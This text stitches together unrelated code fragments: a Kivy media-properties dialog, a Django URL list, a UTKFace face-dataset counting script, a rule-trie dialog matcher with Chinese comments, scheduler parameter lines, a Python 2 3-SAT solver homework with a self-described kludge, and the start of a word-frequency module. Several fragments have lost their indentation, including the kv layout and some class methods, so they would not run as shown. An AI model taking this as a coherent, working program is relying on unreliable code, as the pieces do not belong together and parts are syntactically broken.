id: grid
size_hint: 0.9, None
pos_hint: {'center_x': 0.5}
size_hint_y: None
height: self.minimum_height
cols: 1
spacing: int(cm(0.3))
ConditionLayout:
size_hint: 0.9, None
pos_hint: {'center_x': 0.5}
height: app.mlayout.button_height
condition: True if root.containing_directory else False
spacing: app.mlayout.spacing * 4
FocusButtonScroller:
id: open_fld_button
scroll_when_focused: scroller
is_subfocus: True
text: 'Open containing directory'
on_release: root.open_cont_dir()
FocusButtonScroller:
id: copy_path_button
scroll_when_focused: scroller
is_subfocus: True
text: 'Copy path'
on_release: Clipboard.copy(root.mpath)
''')
class MediaPropertiesDialogText(BoxLayout):
    """One key/value row in the properties dialog (label + text input)."""

    # Bound to the row's Label and text input by the kv rules above.
    t_key = StringProperty()
    t_value = StringProperty()

    def __init__(self, key, value, **kwargs):
        super(MediaPropertiesDialogText, self).__init__(**kwargs)
        # Coerced to str: kv StringProperty values must be strings.
        self.t_key = str(key)
        self.t_value = str(value)
class MediaPropertiesDialog(AppPopup):
    '''Takes a dictionary as first __init__ argument and adds
    Label widget pairs in boxlayouts to display, has handling for
    media data'''

    containing_directory = StringProperty()
    '''Stores directory path which contains media file when a path is found
    in media_dict argument'''

    mpath = StringProperty()
    '''Stores media file path when a path is found in media_dict argument'''

    # Keys from media_dict that are never shown to the user.
    ignored_properties = ['id', 'state']

    def __init__(self, media_dict, **kwargs):
        super(MediaPropertiesDialog, self).__init__(**kwargs)
        self.remove_focus_on_touch_move = False
        self.grab_focus = True
        # Keyboard-focus ring starts with the two buttons; text rows are
        # inserted later by add_content_widgets().
        self.subfocus_widgets = [
            self.ids.open_fld_button, self.ids.copy_path_button]

    def add_content_widgets(self, media_dict):
        '''Find all important information in media_dict and add widgets to self
        '''
        grid = self.ids.grid
        # Adds key and value pairs from media_dict argument
        button_list = []
        for k, v in media_dict.items():
            if k in self.ignored_properties:
                continue
            button_list.append((k, v))
        # Attempts to get and add file tags
        # and other important information from global media cache
        mpath = media_dict.get('path', '')
        if mpath:
            self.containing_directory = get_containing_directory(mpath)
            self.mpath = mpath
            mc = media_cache.get(mpath, None)
            if mc:
                duration = mc.get('duration', None)
                if duration:
                    # Shown as human-readable h/m/s instead of raw seconds.
                    duration = seconds_to_minutes_hours(duration)
                    button_list.append(('duration', duration))
                mc_format = mc.get('format', None)
                if mc_format:
                    for k, v in mc_format.items():
                        # Strip the ffprobe 'TAG:' prefix from tag keys.
                        if k[:4] == 'TAG:':
                            k = k[4:]
                        button_list.append((k, v))
        # One key/value row per entry; each text input joins the focus ring
        # just before the two action buttons.
        for k, v in button_list:
            btn = MediaPropertiesDialogText(k, v)
            tinput = btn.ids.tinput
            tinput.is_subfocus = True
            tinput.scroll_when_focused = self.ids.scroller
            self.subfocus_widgets.insert(-2, tinput)
            grid.add_widget(btn)

    def open_cont_dir(self):
        '''Open directory that contains file'''
        open_directory(self.containing_directory)

    def dismiss(self):
        super(MediaPropertiesDialog, self).dismiss()
        # Hand keyboard focus back to whatever was focused before the popup.
        self.remove_from_focus(prev_focus=True)
        # self.parent.remove_widget(self)

    @staticmethod
    def open_diag(media_dict):
        '''Method for creating and opening dialog'''
        dialog = MediaPropertiesDialog(media_dict)
        dialog.add_content_widgets(media_dict)
        dialog.open()
        return dialog
|
from App import views
from django.urls import path
# app_name enables the 'App01:' URL namespace (e.g. reverse('App01:login')).
app_name = 'App01'
urlpatterns = [
    path('login/',views.login,name='login'),
    path('mark/',views.reply,name='mark'),
    path('home/',views.index,name='home'),
    path('logout/',views.logout,name='logout'),
]
import os
import matplotlib.pyplot as plt
# Tally gender / ethnicity / age distributions from UTKFace filenames, which
# encode metadata as age_gender_ethnicity_timestamp.
files = os.listdir("../../datasets/UTKFace-curated/")  # -curated
print("Total files: "+str(len(files)))

gender_count = [0, 0]
ethnicity_count = [0, 0, 0, 0, 0]
age_count = [0] * 120

for filename in files:
    fields = filename.split("_")
    if len(fields) != 4:
        continue  # skip files that don't follow the naming scheme
    age, gender, ethnicity = (int(part) for part in fields[:3])
    age_count[age] += 1
    gender_count[gender] += 1
    ethnicity_count[ethnicity] += 1

print(gender_count)
print(ethnicity_count)
plt.bar(range(120), age_count)
plt.show()
|
"""
在构建好的规则Trie树中,找出query所有可以匹配的组合
"""
import config
from items import *
from post_handle import apply_post, get_idx_slot, trans_by_post
class Searcher:
    """
    rule_trie: compiled rule Trie
    rule_info: global rule information (post-processing, search config, ...)
    ac_machine: Aho-Corasick automaton over dictionary words and keywords
    """

    def __init__(self, rule_trie, rule_info, ac_machine):
        self.rule_trie = rule_trie
        self.rule_info = rule_info
        self.ac_machine = ac_machine
    def basic_set(self, dialog):
        """Pre-search setup:
        1. find all matched words in the dialog
        2. pre-process rules needing special handling: plus rules and
           non-export rules that require post-processing
        3. drop unused tags, then sort the matches
        """
        self.AM = self.ac_machine.match(dialog)
        special_post = self.special_preprocess(dialog)
        if len(self.rule_trie.keeped_tags) > 0:
            self.AM.delete_tag(self.rule_trie.keeped_tags)
        self.AM.sorted()
        self.AM.build_word_next_idx()
        #print(self.AM.matched)
        return special_post
# 按照贪心策略搜索
def max_match(self, dialog):
special_post = self.basic_set(dialog)
conf = config.get_conf(None, "search")
matched_ans = self._greed_match(self.rule_trie.export_trie, conf)
return matched_ans, special_post
# 完全搜索所有可能
def search_match(self, dialog):
special_post = self.basic_set(dialog)
conf = config.get_conf(None, "search")
matched_ans = self._search_match(self.rule_trie.export_trie, conf)
return matched_ans, special_post
def _search_match(self, fingerprint, conf):
self.AM.reset()
all_matched = []
has_seen = set()
for i in range(len(self.AM.matched)):
matched_ans = self._search_match_helper(i, fingerprint, has_seen, conf)
all_matched.extend(matched_ans)
return all_matched
    # Depth-first search
    def _search_match_helper(self, i, fingerprint, has_seen, conf):
        """Explore every rule path reachable from match position *i*.

        States are (tag-path, automaton state, matched spans); `has_seen`
        de-duplicates (position, path) pairs across calls.
        """
        self.AM.iter_init(i)
        best_ans = []
        stack = [("", self.AM.get_state(), tuple())]

        def __search_helper(new_tp, new_matched_eles, new_state):
            # Record leaf hits and push the extended path for further search.
            search_step_fingerprint = "%d&%s"%(new_state[0], new_tp)
            if search_step_fingerprint in has_seen: return
            has_seen.add(search_step_fingerprint)
            if new_tp in fingerprint:
                if fingerprint[new_tp].isLeaf():
                    best_ans.append(MatchedItem(new_tp, new_matched_eles, fingerprint[new_tp].match_list))
                stack.append((new_tp, new_state, new_matched_eles))

        while len(stack):
            tp, state, matched_eles = stack.pop(0)
            self.AM.reset_state(state)
            if fingerprint[tp].is_next_any():
                any_list = fingerprint[tp].anys
                # Case: the rule ends with __ANY__
                for any_pat in any_list:
                    new_tp = "%s#%s"%(tp, any_pat.to_pat())
                    search_step_fingerprint = "%d&%s"%(state[0], new_tp)
                    if search_step_fingerprint in has_seen: continue
                    has_seen.add(search_step_fingerprint)
                    if new_tp in fingerprint and fingerprint[new_tp].isLeaf():
                        d = any_pat.get_max_dist(state[1], self.AM.dialog_length - 1)
                        if d > 0:
                            new_matched_eles = matched_eles + ((state[1] + 1, d),)
                            best_ans.append(MatchedItem(new_tp, new_matched_eles, fingerprint[new_tp].match_list))
                # Case: __ANY__ occurs in the middle of the rule — look ahead
                # up to 25 elements for a word that satisfies an __ANY__ span.
                for i in range(1, 25):
                    ele = self.AM.look_next(i)
                    if ele is None: break
                    d = self.AM.get_word_dist(ele.start)
                    for any_pat in any_list:
                        if any_pat.is_valid(d):
                            new_tp = "%s#%s#%s"%(tp, any_pat.to_pat(), ele.tag)
                            new_state = (self.AM._i + i, ele.end)
                            new_matched_eles = matched_eles + ((ele.start - d, ele.start - 1), (ele.start, ele.end))
                            __search_helper(new_tp, new_matched_eles, new_state)
            # Plain extension: consume following words while within max_dist.
            while self.AM.has_next():
                ele = self.AM.get_next()
                # Beyond the allowed distance; stop extending this path.
                if self.AM.get_word_dist(ele.start) > conf["max_dist"]:
                    break
                new_tp = "%s#%s"%(tp, ele.tag)
                new_matched_eles = matched_eles + ((ele.start, ele.end),)
                new_state = (self.AM._i, ele.end)
                __search_helper(new_tp, new_matched_eles, new_state)
                if new_tp not in fingerprint and len(matched_eles) > 0:
                    if conf["no_skip_atom"] and ele.tag_type in "0":
                        # NOTE(review): break_flag is set but never read.
                        break_flag = True
                        # an atom lies in between and atoms may not be skipped
                        break
                    elif conf["no_skip_any"]:
                        break
        return best_ans
def _greed_match(self, fingerprint, conf):
    """Run the greedy matcher from every start position in self.AM.matched
    and collect every MatchedItem found."""
    self.AM.reset()
    hits = []
    for start in range(len(self.AM.matched)):
        hits += self._greed_match_helper(start, fingerprint, conf)
    return hits
# Longest (greedy) match of the rules, starting at position i.
def _greed_match_helper(self, i, fingerprint, conf):
    """Greedy BFS over tag paths rooted at element i.

    Each stack entry is (tag_path, saved automaton state, matched slices).
    A path is extended by the FIRST element whose tag keeps the path
    inside the rule trie `fingerprint` (greedy), and is recorded as an
    answer whenever it reaches a trie leaf.
    """
    self.AM.iter_init(i)
    best_ans = []
    stack = [("", self.AM.get_state(), tuple())]
    while len(stack):
        tp, state, matched_eles = stack.pop(0)
        # Restore the automaton to where this path left off.
        self.AM.reset_state(state)
        is_accept = False
        # Greedy: stop scanning as soon as one element extends the path.
        while not is_accept and self.AM.has_next():
            ele = self.AM.get_next()
            #if self.get_word_dist(ele[0]) > self.conf.max_match_dist:
            #    break
            new_tp = "%s#%s"%(tp, ele.tag)
            if new_tp in fingerprint:
                self.AM.accept(ele)
                is_accept = True
                new_matched_eles = matched_eles + ((ele.start, ele.end), )
                # simple
                if fingerprint[new_tp].isLeaf():
                    best_ans.append(MatchedItem(new_tp, new_matched_eles, fingerprint[new_tp].match_list))
                stack.append((new_tp, self.AM.get_state(), new_matched_eles ))
    return best_ans
# Special rules are matched one by one; having many of them hurts speed,
# so they are reserved for special purposes.
# "plus" matching can be exponential in the worst case, but it is rarely
# needed in semantic-matching workloads and greedy matching is usually
# enough, so for maximum performance plus uses greedy matching.
def special_preprocess(self, dialog):
    """Run every special trie (PLUS / search rules) over `dialog`.

    Extends self.AM.matched with any extra groups found and returns the
    accumulated post-processing results keyed by (name, start, end).
    """
    special_post = {}
    _, post = self.special_atom_extract(dialog)
    special_post.update(post)
    for pname, trie in self.rule_trie.special_tries:
        conf_names = self.rule_info.config.get(pname, [])
        rule_tp = self.rule_info.get_rule_type(pname)
        # PLUS rules get the "plus" base config, everything else "search".
        base_tp = "plus" if rule_tp == "PLUS" else "search"
        conf = config.get_confs(conf_names, base_tp)
        matched_items = self._greed_match(trie, conf)
        if matched_items:
            for m in matched_items: m.cal_match_score(dialog)
            if rule_tp == "PLUS":
                all_plus, post = self.plus_extract(matched_items, pname, conf, special_post)
            else:
                all_plus, post = self.special_rule_extract(matched_items, pname, conf, special_post)
            if all_plus:
                special_post.update(post)
                # New groups must keep self.AM.matched sorted for later passes.
                self.AM.matched.extend(all_plus)
                self.AM.sorted()
    return special_post
def special_atom_extract(self, dialog):
    """Post-process the special atoms already present in self.AM.matched.

    Builds the post map for every special atom whose post-processing does
    not veto it via "__MATCH__"; vetoed atoms are removed from
    self.AM.matched.  Returns ([], post).
    """
    special_atoms = self.rule_info.get_special_atoms()
    post = {}
    if not special_atoms:
        return [], post
    rejected = []
    for ele in self.AM.matched:
        if ele.tag in special_atoms:
            slot_indexes, pfunc, _ = self.rule_info.get(ele.tag)
            idx_slot_map = {0: dialog[ele.start: ele.end+1]}
            slots = apply_post(slot_indexes, pfunc, idx_slot_map)
            if "__MATCH__" not in slots or slots["__MATCH__"] == True:
                post[(ele.tag, ele.start, ele.end)] = slots
            else:
                # Collect first, remove after the loop: the original removed
                # from self.AM.matched while iterating it, which silently
                # skips the element following every removed one.
                rejected.append(ele)
    for ele in rejected:
        self.AM.matched.remove(ele)
    return [], post
## Validity check and post-processing.
def special_rule_extract(self, lst, rname, conf, special_post):
    """Turn matched items for rule `rname` into tagged groups.

    When the rule defines slot indexes or a post-function, a match is
    kept only if post-processing does not veto it via "__MATCH__".
    Returns (tags, post).
    """
    tags, post = [], {}
    for c in lst:
        _, slices, perm = c.tnodes[0]
        slot_indexes, pfunc, _ = self.rule_info.get(rname)
        if slot_indexes or pfunc:
            idx_slot_map = get_idx_slot(slices, perm, c.fragments, special_post)
            slots = apply_post(slot_indexes, pfunc, idx_slot_map)
            # "__MATCH__" == False vetoes the match entirely.
            if "__MATCH__" not in slots or slots["__MATCH__"] == True:
                post[(rname, c.begin, c.end)] = slots
                tags.append(AcMatchedGroup(c.begin, c.end, rname, "3"))
        else:
            # No post-processing configured: accept unconditionally.
            tags.append(AcMatchedGroup(c.begin, c.end, rname, "3"))
    return tags, post
def plus_extract(self, lst, tag, conf, special_post):
    """Collapse adjacent matches into "plus" (repetition) groups.

    `lst` appears to be sorted by position (self.AM.sorted() is called by
    the caller — confirm).  Consecutive items within conf["max_dist"] are
    concatenated into a run; a run is emitted once it has at least
    conf["min_N"] members (capped at conf["max_N"]).
    Returns (groups, post) where post maps (tag, begin, end) -> slots.
    """
    ans, post = [], {}
    if not lst: return ans, post
    item = lst[0]
    i, cnt = 1, 1
    while i < len(lst):
        dist = lst[i].begin - item.end
        end_flag = False
        if dist <= 0:
            # Overlapping match: terminates the run only when overlaps
            # are disallowed by configuration.
            end_flag = conf["no_cover"]
            i += 1
        elif dist <= conf["max_dist"] + 1 and cnt < conf["max_N"]:
            # Close enough: extend the current run.
            item.concat(lst[i])
            cnt += 1
            i += 1
        else:
            end_flag = True
        if cnt >= conf["min_N"] and end_flag:
            # Run is long enough: emit a group and its joined fragments.
            frags, _ = trans_by_post(item.fragments, special_post)
            post[(tag, item.begin, item.end)] = {"__OUT__": "".join(frags)}
            ans.append(AcMatchedGroup(item.begin, item.end, tag, "2"))
        if end_flag:
            # Start a new run from the next item (if any).
            if i < len(lst):
                item = lst[i]
                cnt = 1
                i += 1
            else:
                item = None
    # Flush the final run.
    if cnt >= conf["min_N"] and item is not None:
        frags, _ = trans_by_post(item.fragments, special_post)
        post[(tag, item.begin, item.end)] = {"__OUT__": "".join(frags)}
        ans.append(AcMatchedGroup(item.begin, item.end, tag, "2"))
    return ans, post
|
-X FMLP -Q 0 -L 2 97 400
-X FMLP -Q 0 -L 2 95 400
-X FMLP -Q 0 -L 2 89 400
-X FMLP -Q 0 -L 2 82 250
-X FMLP -Q 0 -L 2 56 175
-X FMLP -Q 1 -L 1 45 200
-X FMLP -Q 1 -L 1 42 300
-X FMLP -Q 1 -L 1 39 400
-X FMLP -Q 1 -L 1 36 400
-X FMLP -Q 2 -L 1 32 250
-X FMLP -Q 2 -L 1 31 400
-X FMLP -Q 2 -L 1 23 150
-X FMLP -Q 2 -L 1 20 100
-X FMLP -Q 3 -L 1 20 175
-X FMLP -Q 3 -L 1 19 100
-X FMLP -Q 3 -L 1 13 100
-X FMLP -Q 3 -L 1 10 100
|
# Write a function solve_3SAT using the search-tree technique outlined
# below that takes as its input a 3-SAT instance (see Problem Set 2),
# applies pre-processing (see Problem Set 4), and then uses a search tree
# to find if the given instance has a satisfying assignment. Your function
# should return None if the given instance of 3SAT has no satisfying
# assignment and otherwise return a satisfying assignment.
# Take any clause that is not satisfied
# * If all variables have already been set, then there is no
# possible solution anymore
# * Otherwise, branch into at most three cases where in each case a different
# variable is set so that the clause becomes satisfied:
# - The first variable is set so that clause becomes satisfied
# (and we don't do anything with the other variables)
# - The first variable is set so that the clause does not become satisfied,
#   the second one is set so that it becomes satisfied, and we don't do
#   anything with the third variable.
# - The first and second variables are set so that the clause does not
#   become satisfied; the third one is set so that it does become satisfied.
# Note that any solution must fall into one of the above categories.
# Naturally, after having applied the pre-processing and also during the
# branching, some clauses will not contain three unassigned variables anymore
# and your program needs to account for that.
# You may write any additional functions you require to solve this problem.
def solve_3SAT(num_variables, clauses):
    """Solve a 3-SAT instance via preprocessing plus a search tree.

    Returns a satisfying assignment as a 0/1 list indexed 1..num_variables
    (index 0 is a dummy), or None when the instance is unsatisfiable.
    """
    assignment = [None] * (num_variables + 1) # index 0 is dummy
    assignment[0] = 0
    clauses_pp = sat_preprocessing(num_variables, clauses, assignment)
    general_assignment = recursive_solve_3SAT(num_variables, clauses_pp, assignment)
    # Compare with `is`, not `==`: None is a singleton.
    if general_assignment is None:
        return None
    # Unconstrained variables may be set arbitrarily; pick 0.
    for i in range(len(general_assignment)):
        if general_assignment[i] is None:
            general_assignment[i] = 0
    return general_assignment
# depth = 0
from copy import *
def recursive_solve_3SAT(num_variables, clauses, ori_assignment): # doesn't use num_variables
    """Search-tree step: branch on the first clause not yet satisfied.

    Works on a deep copy of `ori_assignment`, so failed branches do not
    leak partial assignments back to the caller.  Returns a (possibly
    None-padded) satisfying assignment, or None when all branches fail.
    """
    # assert num_variables == len(assignment) - 1
    assignment = deepcopy(ori_assignment)
    take_any_clause = first_unsat_clause(clauses, assignment)
    # global depth
    # depth = depth + 1
    if not take_any_clause:
        # No unsatisfied clause left: the current assignment works.
        return assignment
    # else check if no possible solution
    a=[None]*3
    for j in range(3):
        a[j] = assignment[abs(take_any_clause[j])]
    if a[0]!=None and a[1]!=None and a[2]!=None:
        # All three variables already set, yet the clause is unsatisfied.
        return None
    # otherwise branch into at most 3 cases
    u = abs(take_any_clause[0])
    v = abs(take_any_clause[1])
    w = abs(take_any_clause[2])
    can_do = what_branch(take_any_clause, assignment)
    if (can_do[0]):
        # Branch 1: set the first literal true, leave the others alone.
        # print " " * depth, "b1", take_any_clause, assignment[u], assignment[v], assignment[w], "SET", u
        ##
        if take_any_clause[0] > 0:
            assignment[u] = 1 # could simplify as a[u]=int(c[0]>1)
        elif take_any_clause[0] < 0:
            assignment[u] = 0
        ##
        result = recursive_solve_3SAT(num_variables, clauses, assignment)
        # depth -= 1
        if result != None:
            return result
        # print " " * depth, "failed all b1"
        # FIXME some stuff on reset assignment??
    else:
        # print " " * depth, "b1 NO", take_any_clause, assignment[u], assignment[v], assignment[w]
        pass
    if (can_do[1]):
        # Branch 2: first literal false, second literal true.
        # NOTE(review): this reuses `assignment` as mutated by branch 1;
        # it only works because u and v are overwritten here — confirm.
        # print " " * depth, "b2", "SET", u, v
        ##
        if take_any_clause[0] > 0:
            assignment[u] = 0
        elif take_any_clause[0] < 0:
            assignment[u] = 1
        if take_any_clause[1] > 0:
            assignment[v] = 1
        elif take_any_clause[1] < 0:
            assignment[v] = 0
        ##
        result = recursive_solve_3SAT(num_variables, clauses, assignment)
        # depth -= 1
        if result != None:
            return result
    else:
        # print " " * depth, "b2 NO"
        pass
    if (can_do[2]):
        # Branch 3: first two literals false, third literal true.
        # print " " * depth, "b3", "SET", u, v, w
        ##
        if take_any_clause[0] > 0:
            assignment[u] = 0
        elif take_any_clause[0] < 0:
            assignment[u] = 1
        if take_any_clause[1] > 0:
            assignment[v] = 0
        elif take_any_clause[1] < 0:
            assignment[v] = 1
        if take_any_clause[2] > 0:
            assignment[w] = 1
        elif take_any_clause[2] < 0:
            assignment[w] = 0
        ##
        result = recursive_solve_3SAT(num_variables, clauses, assignment)
        # depth -= 1
        if result != None:
            return result
    else:
        # print " " * depth, "b3 NO"
        pass
    return None
def first_unsat_clause(clauses, assignment):
    """Return the first clause not yet satisfied, or [] when all are."""
    for clause in clauses:
        if not is_satisfied(clause, assignment):
            return clause
    return []
def what_branch(clause, assignment):
    """Decide which of the three search-tree branches apply to `clause`.

    Returns [b1, b2, b3]:
      b1 - literal 1 can be (or already is) true;
      b2 - literal 1 can be false while literal 2 can be true;
      b3 - literals 1-2 can be false while literal 3 can be true.
    An unassigned variable (None) counts as "can be either".  Assignment
    values are 0/1, so truth tests use `==` (1 == True) — only the None
    checks use identity.
    """
    assert len(clause) == 3
    doable = [False] * 3
    vals = [None] * 3
    for j in range(3):
        vals[j] = assignment[abs(clause[j])]
        # A negated literal sees the flipped truth value (None stays None).
        if clause[j] < 0 and vals[j] is not None:
            vals[j] = not vals[j]
    if vals[0] == True or vals[0] is None:
        doable[0] = True
    if (vals[0] == False or vals[0] is None) and (vals[1] == True or vals[1] is None):
        doable[1] = True
    if (vals[0] == False or vals[0] is None) and (vals[1] == False or vals[1] is None) and (vals[2] == True or vals[2] is None):
        doable[2] = True
    return doable
###########################
def is_satisfied(clause, assignment): # takes a single clause
    """True when some literal of `clause` is made true by `assignment`.

    Unassigned variables (None) are skipped: a clause containing only
    None/false literals counts as NOT satisfied, which is exactly what
    the search's "take any clause that is not satisfied" step needs.
    """
    for lit in clause:
        val = assignment[abs(lit)]
        # `is None`, not `== None`: None is a singleton.
        if val is None:
            continue
        if lit > 0 and val == True:
            return True
        if lit < 0 and val == False:
            return True
    # Falls through when the clause has only false or unassigned literals.
    return False
######## PREPROCESSOR
from copy import *
def rule1(assignment, clauses): # If a clause has only 1 var, var must be true.
    """Unit-clause rule: a single-literal clause forces its variable."""
    for clause in clauses:
        if len(clause) == 1:
            literal = clause[0]
            # Positive literal -> True, negative literal -> False.
            assignment[abs(literal)] = (literal > 0)
    return assignment
def rule2(assignment, clauses): # If a var occurs only once, easy to set to true.
    """Single-occurrence rule, using a per-variable sentinel encoding:
    0 = unseen, +1/-1 = seen exactly once (sign of that literal), 2 = seen 2+ times."""
    occurrences = [0] * (len(assignment)) # 0 means 0. 1 or -1 means 1. 2 means 2+.
    for row in clauses: # count up occurrences in prep for rule 2
        for term in row:
            if occurrences[abs(term)] > 1:
                continue
            elif abs(occurrences[abs(term)]) == 1:
                occurrences[abs(term)] = 2 # occurs > 1 time
            elif occurrences[abs(term)] == 0 and assignment[abs(term)]==None:
                # NOTE(review): abs(term)/term relies on Python 2 integer
                # division to give exactly +1/-1 (this file uses Python 2
                # print statements); under Python 3 it yields a float
                # (1.0/-1.0) — verify before porting.
                occurrences[abs(term)] = abs(term)/term # 1 or -1 if exactly 1 time
    for var_num in range(1,len(occurrences)): # modify assignment for any vars occurring 1 X.
        if abs(occurrences[var_num])==1 and assignment[var_num]==None:
            # Set the variable so its single literal is true.
            assignment[var_num] = (occurrences[var_num] > 0)
    return assignment
def rule3(assignment, clauses): # Remove any satisfied clauses.
    """Drop every clause already satisfied by the current assignment."""
    for idx, clause in enumerate(clauses):
        if clause == "sat":
            continue
        for lit in clause:
            val = assignment[abs(lit)]
            if (lit > 0 and val == True) or (lit < 0 and val == False):
                # Mark instead of deleting so loop indices stay stable.
                clauses[idx] = "sat"
                break
    while "sat" in clauses:
        clauses.remove("sat")
    return clauses
def rule4(assignment, clauses): # Remove any FALSE variables.
    """Strip literals made false by the assignment from every clause.

    Returns "FAIL" when some clause loses all of its literals (conflict);
    otherwise returns the pruned clause list (mutated in place).
    """
    for var in range(1, len(assignment)):
        val = assignment[var]
        if val is None:
            continue
        # The false literal is the one whose sign disagrees with `val`.
        doomed = var if val == False else -var
        for clause in clauses:
            while doomed in clause:
                clause.remove(doomed)
            if clause == []:
                return "FAIL"
    return clauses
def sat_preprocessing(num_variables, clauses, assignment):
    """Iterate simplification rules 1-4 until a fixed point is reached.

    Mutates `assignment` in place and returns the simplified clause list.
    On a detected conflict, returns the trivially unsatisfiable instance
    [[1], [-1]] so the caller's search reports failure.
    """
    # print "****"
    oa=0
    oc=0
    # Loop until neither the assignment nor the clause list changes.
    while not (oa==assignment and oc==clauses): # (oa[1:len(oa)] == assignment[1:len(assignment)])
        oa=deepcopy(assignment)
        oc=deepcopy(clauses)
        # print
        # print "ini: a=", assignment[1:len(assignment)], "c=", clauses
        assignment=rule1(assignment, clauses)
        # print "pr1: a=", assignment[1:len(assignment)], "c=", clauses
        assignment=rule2(assignment, clauses)
        # print "pr2: a=", assignment[1:len(assignment)], "c=", clauses
        clauses=rule3(assignment, clauses)
        # print "pr3: a=", assignment[1:len(assignment)], "c=", clauses
        clauses=rule4(assignment, clauses)
        if clauses=="FAIL":
            return [[1],[-1]] # FIXME. Stupid kludge to pass class. Technically it should be [[1],[-1]]
        # print "pr4: a=", assignment[1:len(assignment)], "c=", clauses
    return clauses
####################
def test():
    """Regression checks against two small instances (Python 2 script)."""
    # Satisfiable instance: the result must be one of the listed solutions.
    clauses = [[-2, -3, -1], [3, -2, 1], [-3, 2, 1],
               [2, -3, -1], [3, -2, 1], [3, -2, 1]]
    solutions = [[0, 0, 0, 0],
                 [0, 0, 1, 1],
                 [0, 1, 0, 0],
                 [0, 1, 1, 0],
                 [1, 0, 0, 0],
                 [1, 0, 1, 1],
                 [1, 1, 0, 0],
                 [1, 1, 1, 0]]
    assert solve_3SAT(3,clauses) in solutions
    # Unsatisfiable instance: the solver must return None.
    clauses = [[2, 1, 3], [-2, -1, 3], [-2, 3, -1], [-2, -1, 3],
               [2, 3, 1], [-1, 3, -2], [-3, 2, 1], [1, -3, -2],
               [-2, -1, 3], [1, -2, -3], [-2, -1, 3], [-1, -2, -3],
               [3, -2, 1], [2, 1, 3], [-3, -1, 2], [-3, -2, 1],
               [-1, 3, -2], [1, 2, -3], [-3, -1, 2], [2, -1, 3]]
    assert solve_3SAT(3,clauses) == None
    print 'Tests passed'
# test()
######### MY TESTS
clauses1 = [[-2, -3, -1], [3, -2, 1], [-3, 2, 1],
[2, -3, -1], [3, -2, 1], [3, -2, 1]]
clauses2 = [[2, 1, 3], [-2, -1, 3], [-2, 3, -1], [-2, -1, 3],
[2, 3, 1], [-1, 3, -2], [-3, 2, 1], [1, -3, -2],
[-2, -1, 3], [1, -2, -3], [-2, -1, 3], [-1, -2, -3],
[3, -2, 1], [2, 1, 3], [-3, -1, 2], [-3, -2, 1],
[-1, 3, -2], [1, 2, -3], [-3, -1, 2], [2, -1, 3]]
w1 = [[-15, -4, 14], [-7, -4, 13], [-2, 18, 11], [-12, -11, -6],
[7, 17, 4], [4, 6, 13], [-15, -9, -14], [14, -4, 8], [12, -5, -8],
[6, -5, -2], [8, -9, 10], [-15, -11, -12], [12, 16, 17],
[17, -9, -12], [-12, -4, 11], [-18, 17, -9], [-10, -12, -11],
[-7, 15, 2], [2, 15, 17], [-15, -7, 10], [1, -15, 11],
[-13, -1, -6], [-7, -11, 2], [-5, 1, 15], [-14, -13, 18],
[14, 12, -1], [18, -16, 9], [5, -11, -13], [-6, 10, -16],
[-2, 1, 4], [-4, -11, 8], [-8, 18, 1], [-2, 15, -13],
[-15, -12, -10], [-18, -14, -6], [1, -17, 10], [10, -13, 2],
[2, 17, -3], [14, 1, -17], [-16, -2, -11], [16, 7, 15],
[-10, -6, 16], [4, -5, 10], [8, 10, -12], [1, -9, -14],
[18, -9, 11], [16, 7, 12], [-5, -14, -13], [1, 18, 5], [11, 16, 5],
[-8, 12, -2], [-6, -2, -13], [18, 16, 7], [-3, 9, -13], [-1, 3, 12],
[-10, 7, 3], [-15, -6, -1], [-1, -7, -3], [1, 5, 13], [7, 6, -9],
[1, -4, 3], [6, 8, 1], [12, 14, -8], [12, 5, -13], [-12, 15, 9],
[-17, -8, 3], [17, -6, 8], [-3, -14, 4]]
w2=[[15, 4, -3], [-14, -15, 5], [-19, -16, 17], [7, 18, -5], [-14, -16, 12],
[-16, -9, 18], [9, 16, 4], [-10, 18, 5], [-11, 4, 2], [-6, -12, -16],
[12, 3, 5], [-1, -12, -18], [8, -15, 11], [-1, 5, 13], [-10, -4, -15],
[-17, 1, -15], [3, 12, 17], [17, 2, 19], [7, 1, -17], [9, 15, -19],
[-8, 2, -16], [7, -2, 17], [-3, 11, -6], [-11, 10, -3], [15, -13, -3],
[5, -16, -9], [8, 15, 11], [12, 14, -18], [12, -8, 19], [-15, 4, -8],
[8, 9, -1], [-17, -12, -18], [-2, -3, 8], [-3, 4, -1], [15, 2, 19],
[-3, -8, -6], [12, 17, 2], [-11, 12, 1], [12, -9, -8], [-7, -14, 2],
[10, 14, -11], [-2, 17, 14], [-17, 15, 1], [19, 2, 7], [18, -16, -7],
[-7, -1, 13], [1, 19, -7], [18, 2, -3], [15, -3, 1], [10, 14, -12],
[15, -3, -2], [1, -18, -2], [18, -3, -13], [2, 16, 6], [10, -5, -15],
[-13, -1, -16], [-4, -6, -11], [-15, 4, 1], [-12, -16, 5], [-10, 4, -2],
[-10, 1, 6], [-3, 13, -19], [5, -8, -11], [11, 6, -12], [7, 15, -8],
[6, 1, -5], [-7, 1, -19], [18, -4, -7], [6, 16, 5], [-8, 19, 2],
[13, 4, 11], [-10, -13, -19], [1, 19, 12], [-5, 17, 14], [-5, 1, -7],
[-6, 13, -11], [18, -10, -12], [-7, -8, 12], [2, -5, 8], [-14, -15, 16],
[13, -6, -7], [15, 14, -1], [14, -2, 3], [18, 15, 5], [3, -8, -19],
[-3, -11, -6], [10, 12, -17], [2, -12, 1], [-8, -9, -19], [-11, 17, 5],
[-18, -3, 8], [-17, -8, -12]]
# Recorded outputs from earlier runs, kept as a regression reference:
# w2 [0, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0]
# w1 [0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0] MASTER
# w1 [0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 1, 0] FIX_1118
# Solve the 19-variable instance w2 (Python 2 print statements).
print "solving"
x=solve_3SAT(19,w2)
print x
print
|
'''
Author: Jane Wharton
Company: Geek Sources, Inc.
diction.py:
This module is designed to analyze the diction of a text and return
a value representing its "uniqueness" or how common the words it
contains are when compared against the databases stored in the
wordfreq library.
Example use of TriteWords.test for assertions / debug:
debug print statement example
cls.test("found word: {}!".format(word))
assertion example
cls.test("type(word) is str: ",
statement=(type(word) is str), assertion=True
)
'''
import spacy # pip install spacy
import contextualSpellCheck # spacy
#import json
import wordfreq # pip install wordfreq
from jtest import Test
class TriteWords:
    """Bucket words by how common they are on the wordfreq Zipf scale."""

